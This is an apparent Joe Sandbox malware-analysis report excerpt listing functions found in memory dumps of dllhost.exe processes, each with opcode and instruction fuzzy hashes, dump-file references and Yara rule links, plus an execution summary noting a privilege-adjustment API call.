Similarity

API ID:
String ID: )
API String ID: 0-2427484129
Opcode ID: dbded22480c0eb882ed1f3cc0c9ff58d82ccc54dc981cf3a2510ce197940a92a
Instruction ID: 1c2250fd2f9b1b3f0a4eae7f28d38bce415b303b8b500bdd8f189c636829351b
Opcode Fuzzy Hash: dbded22480c0eb882ed1f3cc0c9ff58d82ccc54dc981cf3a2510ce197940a92a
Instruction Fuzzy Hash: A8C04C74F05248CBEB44AFF4852839C76E5AB45305F80455D940AAA395EA7919048F51

Function 04BC03AF Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

h, xrefs: 04BC03C4

Memory Dump Source

Source File: 00000026.00000002.2112372857.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: h
API String ID: 0-2439710439
Opcode ID: 3e02fcc568aff76ce96603435543fdecb5c03c9fd5583ecefd4464f588fcf84e
Instruction ID: 205c096ee8d423e67985689aa6165c58bb205ac7c30a6ac0472dab3901208914
Opcode Fuzzy Hash: 3e02fcc568aff76ce96603435543fdecb5c03c9fd5583ecefd4464f588fcf84e
Instruction Fuzzy Hash: 5BC04C74B05248CBDF84AFF485582AC76A5AF45305F90462D5406A7395EF7918149F41

Function 04BC08DC Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

L, xrefs: 04BC08F4

Memory Dump Source

Source File: 00000026.00000002.2112372857.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: L
API String ID: 0-2909332022
Opcode ID: 81d1b52ceface96096d7eaaa14651882a10da95d9a4fa62cb1b837a63a90f206
Instruction ID: de0ac2c1d83b7a431c3da179ffa14a600310e626b73d6e1fd8ebd295671154ff
Opcode Fuzzy Hash: 81d1b52ceface96096d7eaaa14651882a10da95d9a4fa62cb1b837a63a90f206
Instruction Fuzzy Hash: BDC04C74A06144CBEB84AFF4851879C76A5AB45304F90445D950AA6395EA781A048B45

Function 04BC0415 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

\, xrefs: 04BC042A

Memory Dump Source

Source File: 00000026.00000002.2112372857.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: \
API String ID: 0-2967466578
Opcode ID: 3ec677453023c193cf7032447f37273521ccd7ecd80206a3b272e62deaab02d2
Instruction ID: 90e7ed6ec4bf410cdec49335a86260f52249c3265d4af76c1411857356740ac8
Opcode Fuzzy Hash: 3ec677453023c193cf7032447f37273521ccd7ecd80206a3b272e62deaab02d2
Instruction Fuzzy Hash: F5C04C74E05244CBEB54AFF4852869CB6A1AB45305F90841D9516A7395EA7814048F41

Function 04BC04C9 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

[, xrefs: 04BC04DE

Memory Dump Source

Source File: 00000026.00000002.2112372857.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: [
API String ID: 0-784033777
Opcode ID: 6f31787308df434d23eb02cf1eb40ebdbb17a71347a7a165bbdd9f386a181230
Instruction ID: af3fbfad22941cdc1ca3a56e48221f5d6a61716e62d0849615f8f7e573ba7474
Opcode Fuzzy Hash: 6f31787308df434d23eb02cf1eb40ebdbb17a71347a7a165bbdd9f386a181230
Instruction Fuzzy Hash: 4DC04C74A05244CBEB44AFE4851829D76A5AB45345F8084199506EB394EA781504CF41

Function 04BC0500 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

;, xrefs: 04BC0515

Memory Dump Source

Source File: 00000026.00000002.2112372857.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: ;
API String ID: 0-1661535913
Opcode ID: 2c14996a1ef160f68fd97a483da98e072aefa768d86662fb1f858b9f97d8e9ad
Instruction ID: 0f8732272376283aa5dc6abaeefe58bf87ced222fbd518bdc403985adc4436de
Opcode Fuzzy Hash: 2c14996a1ef160f68fd97a483da98e072aefa768d86662fb1f858b9f97d8e9ad
Instruction Fuzzy Hash: 94C04C74A06144CBDB44AFF4811829D76A5AB45344F90452D5506A7395EA791A14CB41

Function 04BC0340 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

6, xrefs: 04BC0358

Memory Dump Source

Source File: 00000026.00000002.2112372857.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: 6
API String ID: 0-498629140
Opcode ID: ebac908ec567b940f49883d57cb12d1a013a73c99223f7ada29fe03da208083d
Instruction ID: 93b3d8620cbe09f8e630a691ef864eae68f77306b80120112e6e94650a0d9237
Opcode Fuzzy Hash: ebac908ec567b940f49883d57cb12d1a013a73c99223f7ada29fe03da208083d
Instruction Fuzzy Hash: 7AC08C30A02104CBDB80AFF0801839C76E0AB02300F808459800EA63A0EE3809048B41

Function 0485F298 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2103001986.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4850000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa3d7f2edd56a9a79ab405d38f8cd2011a24f680e07c2cf7deff268b329fcec6
Instruction ID: f5398caf292f71ac1adaa7596ab7a9d6336dd89014ea964aad451fcee3ed79ad
Opcode Fuzzy Hash: fa3d7f2edd56a9a79ab405d38f8cd2011a24f680e07c2cf7deff268b329fcec6
Instruction Fuzzy Hash: E5212F78A04209CBEB04EFB8E5082ADB7F1FF41308F504969DB06D7264EF74AA14DB52

Function 00A505DF Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2076186687.0000000000A50000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_a50000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4c8a97f114220972a380e7ff221d73bf006bdd7480499d30b0a1d59bfb10f6c
Instruction ID: c77dbdb21461d4e3b3e16b8a49c80f9c3024eb010c0aac3b53a25e57f9c83adc
Opcode Fuzzy Hash: c4c8a97f114220972a380e7ff221d73bf006bdd7480499d30b0a1d59bfb10f6c
Instruction Fuzzy Hash: C101DB755097845FC711CF15DC40897BFE8DF8623070984ABED498B212C135B918CBB1

Function 04850007 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2103001986.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4850000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb8177d53823ea2588d5f612e56418a9161e92242991201c39c1d4fb9384673a
Instruction ID: 98a1f19ad0de7ff4f03bb499a5f213b773f4cb84344d40fac360f458114e76e6
Opcode Fuzzy Hash: fb8177d53823ea2588d5f612e56418a9161e92242991201c39c1d4fb9384673a
Instruction Fuzzy Hash: 010157A484F7D69FD71347B41C746983FB0AE13114B5E82DBC480DA0E3D25D495ACB22

Function 0485206F Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2103001986.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4850000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf37f158caf9d428e778668d61b7550d0d749d66bba1f86c08a9fd0778a5ec1e
Instruction ID: b9d2b732fef339a0caca663a4817b52239bcd96e0a900e510ea55ba36bd05de8
Opcode Fuzzy Hash: bf37f158caf9d428e778668d61b7550d0d749d66bba1f86c08a9fd0778a5ec1e
Instruction Fuzzy Hash: ECF04979A05258CBCB589F24D8A876CBBB1FB85301F1089A5EC46D33A4DE749E84CF81

Function 04851704 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2103001986.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4850000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42ab53495f3f71de5cb58f361cb82782995806b7df17b2f492b687832777b64b
Instruction ID: 042f4b237a1747fccc118e07d24428bbdc805e75f9ecc9df990f00ef6d79ecba
Opcode Fuzzy Hash: 42ab53495f3f71de5cb58f361cb82782995806b7df17b2f492b687832777b64b
Instruction Fuzzy Hash: A7F01DB8B05159DBDB148F34DD587ACBBB1BB8A300F0489A5E90AE22A0DF749F44CF41

Function 00A50606 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2076186687.0000000000A50000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_a50000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c76757cd51128125b214808ac379f50cd2e4b819f9706ac8aa46a3dd6468071
Instruction ID: efd077258ad022fa326080968a2089822e779659798d2406c8a374c374777562
Opcode Fuzzy Hash: 7c76757cd51128125b214808ac379f50cd2e4b819f9706ac8aa46a3dd6468071
Instruction Fuzzy Hash: 6AE092B66446004B9650CF0BEC41452F7D8EB88670B08C07FDC0D8B701E275B508CAB5

Function 048515D9 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2103001986.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4850000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5e468d5eebd2fd645c2d5ce8a2b398b63c5739796ff4253ecdbd7f6c3112020
Instruction ID: 76df1d52c0b74904f7d3c849dc218c4d3f81639d08532d3a400cb7b44591a172
Opcode Fuzzy Hash: e5e468d5eebd2fd645c2d5ce8a2b398b63c5739796ff4253ecdbd7f6c3112020
Instruction Fuzzy Hash: B0017EB4D0022DDFCB60CF14CD80BD9B7B5BB4A204F0081EA9A4EA3211EB316E84DF59

Function 04856D48 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2103001986.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4850000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96a93edf62409a0ef0d8289b5bf6724860031685300de1079ad64c33ac782749
Instruction ID: cdac4adcfa050ecdd26802cbe2c6be5c9e97885f74c0c876bdd3c579103fdaad
Opcode Fuzzy Hash: 96a93edf62409a0ef0d8289b5bf6724860031685300de1079ad64c33ac782749
Instruction Fuzzy Hash: 3FF02B38B00208DBCB24ABB0B81D368779AFB86705F000968DE06C3391EFB66E44C352

Function 04853A05 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2103001986.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4850000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cb35311d580f4fd7505885919f9a2566b26e988a99b4a8a966540533eec69ed
Instruction ID: 4cfacfcb82a256c33990fe25946cbad59b2f418d7604f74047a69158dd0fbb0d
Opcode Fuzzy Hash: 7cb35311d580f4fd7505885919f9a2566b26e988a99b4a8a966540533eec69ed
Instruction Fuzzy Hash: C8E08C357041A4CBEB409B1CC91539C32E0AB09354F088AA6EC06DB292CB39AD408F87

Function 04852E1A Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2103001986.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4850000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b9c665f34b7e1bdca13d82a0eb8a219ad1675bda83e1a770900de0b5c797a7f
Instruction ID: 823b1d1cdd5149f02033655d632333af1f4206fbd3a0d7d48e5ab16e2c43fd7b
Opcode Fuzzy Hash: 3b9c665f34b7e1bdca13d82a0eb8a219ad1675bda83e1a770900de0b5c797a7f
Instruction Fuzzy Hash: 77E08C39A04251EFEB049F64EC1876D77A8FB09350F0849B6AC4AC3390EA385E40CF62

Function 008323F4 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2073384635.0000000000832000.00000040.00000800.00020000.00000000.sdmp, Offset: 00832000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_832000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00aab0c443c48cfd7803f609f3da242149c8713e7c0831f9c32f9cdb8888be38
Instruction ID: f2c921debb0c607195ebbca0accf7717df7c6e8991f46c18220589d834b5a044
Opcode Fuzzy Hash: 00aab0c443c48cfd7803f609f3da242149c8713e7c0831f9c32f9cdb8888be38
Instruction Fuzzy Hash: 54D05E792096818FE716DA1CC1A4B9537D4FB91714F4A48F9A840CB763C768E9C1D640

Function 008323BC Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2073384635.0000000000832000.00000040.00000800.00020000.00000000.sdmp, Offset: 00832000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_832000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da6d56b05e0824c1466f7436676d03880dd85cbbbcf43d12f4d5f644cbad16be
Instruction ID: 6af1893b86c8c86996c9be95cd01784d373f96ed4e37566f83a17d97638059c2
Opcode Fuzzy Hash: da6d56b05e0824c1466f7436676d03880dd85cbbbcf43d12f4d5f644cbad16be
Instruction Fuzzy Hash: 0DD05E356452814BDB15DA0CC2D4F5973D4BB84B14F0644E8AC10CB372C7A8D8C0CA40

Function 0485110B Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2103001986.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4850000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36bd951ca433e5b4f510183c95e1802d2b7e33d530e1b0c4e3111d7d0d7282a7
Instruction ID: eeb8d620abcc7c44d45843c927108b6e103d7da59ebacbf8f2d0b704877d6b6a
Opcode Fuzzy Hash: 36bd951ca433e5b4f510183c95e1802d2b7e33d530e1b0c4e3111d7d0d7282a7
Instruction Fuzzy Hash: BCD09E79A08114D7E7144F14ED583AC7664FB05355F144AA4AD09D61A0CBB9AE44CF82

Function 04BC0DF9 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2112372857.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 304324df9e590d19e0c3f57aea581d50b61e1204abb185aceff81e34da3442b8
Instruction ID: 359241e4b16270312ed0f8913d2da4d87ac420d772a5f7067c37fc865cdf3a68
Opcode Fuzzy Hash: 304324df9e590d19e0c3f57aea581d50b61e1204abb185aceff81e34da3442b8
Instruction Fuzzy Hash: 44C04C916BE3C90ED71302701854094AF2448B712530950DBE089CA1A2D61A49158B21

Function 04BC057C Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2112372857.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06d186bee13e0aabc600f0442186eccc103e5f995df06b8f2aabba4e43d2ae25
Instruction ID: bfd238b0ad17b45036a4355ede400e49676bd4154b4b6092921b8f23c4642c04
Opcode Fuzzy Hash: 06d186bee13e0aabc600f0442186eccc103e5f995df06b8f2aabba4e43d2ae25
Instruction Fuzzy Hash: FDC04C74E09248CBEB94AFF4915839C7AA1AB45304F90451D9406A7395EE7819449B51

Function 04BC098D Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2112372857.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f16c79fd774e1e6f1f8353b26a57c18a837c8a7a229ea412d19db400de37229a
Instruction ID: d1a951a4bc77aaf8164c3e5e359f6e6e7ad348f5a513e19dfb758de627e45ab5
Opcode Fuzzy Hash: f16c79fd774e1e6f1f8353b26a57c18a837c8a7a229ea412d19db400de37229a
Instruction Fuzzy Hash: BBC04C74E05244CBEB44AFE4C15839C7AA1AB45304F904419940AAB394EA791444CB41

Function 0485F250 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2103001986.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4850000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93d8277f2ea943c1b1f0c980f864df704e6fb85bbdb405cab3c0df46892fb916
Instruction ID: 0ca9454c7243953b4e8c8e84208a54a141a570e0e8c9fa4162bfbba784800161
Opcode Fuzzy Hash: 93d8277f2ea943c1b1f0c980f864df704e6fb85bbdb405cab3c0df46892fb916
Instruction Fuzzy Hash: 9BB0123104130949C7301170A401220320C4F4150AE1000F9550C05B02D93AA0404049

Function 048569A8 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2103001986.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4850000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2b739e6143de4b2e80f1910f2a15913308529585e9a6837397fe98f9abcd8c9
Instruction ID: ce9f0d320568e7aeddd1da0d443e20918fc001d358bb9c195afdc7c1ad0b123c
Opcode Fuzzy Hash: c2b739e6143de4b2e80f1910f2a15913308529585e9a6837397fe98f9abcd8c9
Instruction Fuzzy Hash: 32A011300002088BC200ABA8E008EA033ECAB08A08F0000F0A20C8BA228A22B8008A82

Function 0485A2A8 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2103001986.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4850000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abc24f4d7ec29cbee2fc55f6bf05743e6b25731d646484f61f3069516316c298
Instruction ID: 8552c30c813ee26900958bd9350a345fe23d6b1fe402bb311051d99ee373c21a
Opcode Fuzzy Hash: abc24f4d7ec29cbee2fc55f6bf05743e6b25731d646484f61f3069516316c298
Instruction Fuzzy Hash: 73A02238000A0C8B00C033EC380A02CB32CAC8000A3C00802A80C800232FE2B820C8A3

Function 04856AE0 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2103001986.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4850000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41e53e667c812a6a718fbf4756a9e12571af95fdac537f418c193bf419fd828e
Instruction ID: 7a37bd59c523511826c5d1c55078843e9b1dcd39b295030e9dd2ce83600917bf
Opcode Fuzzy Hash: 41e53e667c812a6a718fbf4756a9e12571af95fdac537f418c193bf419fd828e
Instruction Fuzzy Hash: D4A02232082B0C83C20022B02000030B38C8A0200C3E200B8830C08F202AB3F0A0808C

Function 0485F758 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2103001986.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4850000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdb82b583e19e13ecc85bd40464efafae874f8c3f84059295d1731d23ba1f947
Instruction ID: 9f298da58c252dbc3072962d7ff01bcfe03185eda77c8a410282eaeed15df0b9
Opcode Fuzzy Hash: cdb82b583e19e13ecc85bd40464efafae874f8c3f84059295d1731d23ba1f947
Instruction Fuzzy Hash: 02A0021168C30C22D44022D67802B55765C4B92A69E814061E60D0AE911982745410EE

Function 04BC0E08 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2112372857.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93c168adda64cee662b231975772461a8d69b75cc9b8eb7ecd405031902baedd
Instruction ID: 561036fe7af1ca5b89911b14e33b34be8dcf07ffa9ca6489a158acbc6734831c
Opcode Fuzzy Hash: 93c168adda64cee662b231975772461a8d69b75cc9b8eb7ecd405031902baedd
Instruction Fuzzy Hash:

Function 0485E018 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2103001986.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4850000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe25382dc4387861d632f06b316ab80a6aef87f2340c896e345901a5bd920e97
Instruction ID: e6c7e2f0f99832c52a1b4c0691f2aa540cc5f63328810c89bd4734eef8738cae
Opcode Fuzzy Hash: fe25382dc4387861d632f06b316ab80a6aef87f2340c896e345901a5bd920e97
Instruction Fuzzy Hash: D790047514470CCF454037D57D0D555F75CF5455157D14051F50D41511DF757510C7D5

Function 0485F840 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2103001986.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4850000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51c872eac4cb80c8743b871452a846471e1861bb32d0405901d78841f2dc8abf
Instruction ID: 2750d2a667c22864fcb631b9a9c2016866c9b6878674cfcb6a828f52c178f59a
Opcode Fuzzy Hash: 51c872eac4cb80c8743b871452a846471e1861bb32d0405901d78841f2dc8abf
Instruction Fuzzy Hash:

Function 04856C48 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2103001986.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4850000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a71a6dd86c62e6634d0ef5f90f98c85e53b087b1f8e6af08c1ff504e38332d0
Instruction ID: e57354dde3fec212bf98a2b796b090a8f4e4701070449799e9b6f890f06359f7
Opcode Fuzzy Hash: 3a71a6dd86c62e6634d0ef5f90f98c85e53b087b1f8e6af08c1ff504e38332d0
Instruction Fuzzy Hash:

Function 0485F6D8 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2103001986.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4850000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3aa8f87c75e8469e6d0a4aafbca7310bc34d69b4af3da65df07eaf514dd202a
Instruction ID: 59550be9a9f2389136b791784b27d15fa304775db72fca1d2949a4ddc35cad81
Opcode Fuzzy Hash: c3aa8f87c75e8469e6d0a4aafbca7310bc34d69b4af3da65df07eaf514dd202a
Instruction Fuzzy Hash:

Function 0485EEE0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2103001986.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4850000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5598a2dfce6bcd49ec3a5a0a07283a3dbad36fef8957a7fc1525430a58ee4678
Instruction ID: 6f55f2ec6c044a33beb2a51579f617e805c186c833549e067b6e6bc9fbdabd89
Opcode Fuzzy Hash: 5598a2dfce6bcd49ec3a5a0a07283a3dbad36fef8957a7fc1525430a58ee4678
Instruction Fuzzy Hash: B090223000030CCB00002F803808088330CE000C223800000A20C002000E22200080C8

Function 0485DE00 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2103001986.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4850000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03cd680a47bad63938f28c323e3fbb0e4d7ee67f1cea3a6430be369a4dc710e7
Instruction ID: 1d1fcd6e751b36ed1c7b36ad0e03c57b68979ad38b3770e70843e5ca3dfdfd6b
Opcode Fuzzy Hash: 03cd680a47bad63938f28c323e3fbb0e4d7ee67f1cea3a6430be369a4dc710e7
Instruction Fuzzy Hash: CB90223000020C8B020023803808080B30CA0000003800000A00C020028A20E8008088

Function 0485F278 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2103001986.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4850000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4f68e299b0d40e1dd9060aa4ba0a58ceac0bc636ba01ce3e8162db410e03c43
Instruction ID: 3ea9e811be99b730fa6b6334e8eb30581383d1e865ba310b7e29a0613872880b
Opcode Fuzzy Hash: c4f68e299b0d40e1dd9060aa4ba0a58ceac0bc636ba01ce3e8162db410e03c43
Instruction Fuzzy Hash: 1E90023544460ECB458467957909559775CA5455157800055A60D415125E556410859D

Function 0485F718 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2103001986.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4850000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 013898ae27492fbe3d3be5fcb1f1c80de388692d8e55696f80f5ce8d8d51eb2b
Instruction ID: 78a24ee54de588c6940f29d22e79c22282a74f0632238a95fa07df8fed51df7f
Opcode Fuzzy Hash: 013898ae27492fbe3d3be5fcb1f1c80de388692d8e55696f80f5ce8d8d51eb2b
Instruction Fuzzy Hash:

Analysis Process: dllhost.exePID: 6544, Parent PID: 4084COMMON

Execution Graph

Execution Coverage:	13%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	66
Total number of Limit Nodes:	6

Executed Functions

Function 0082B32F Relevance: 1.6, APIs: 1, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0082B3AF

Memory Dump Source

Source File: 00000027.00000002.2180576742.000000000082A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_82a000_dllhost.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 708cb23ba5f0e01da4e88928ec30016f23093588e967bab33b81b43f7e081ad3
Instruction ID: 61d1436c4e4e52a0ecb1f96bb213ecf59121a7da01c0577f642f5153b6138c5f
Opcode Fuzzy Hash: 708cb23ba5f0e01da4e88928ec30016f23093588e967bab33b81b43f7e081ad3
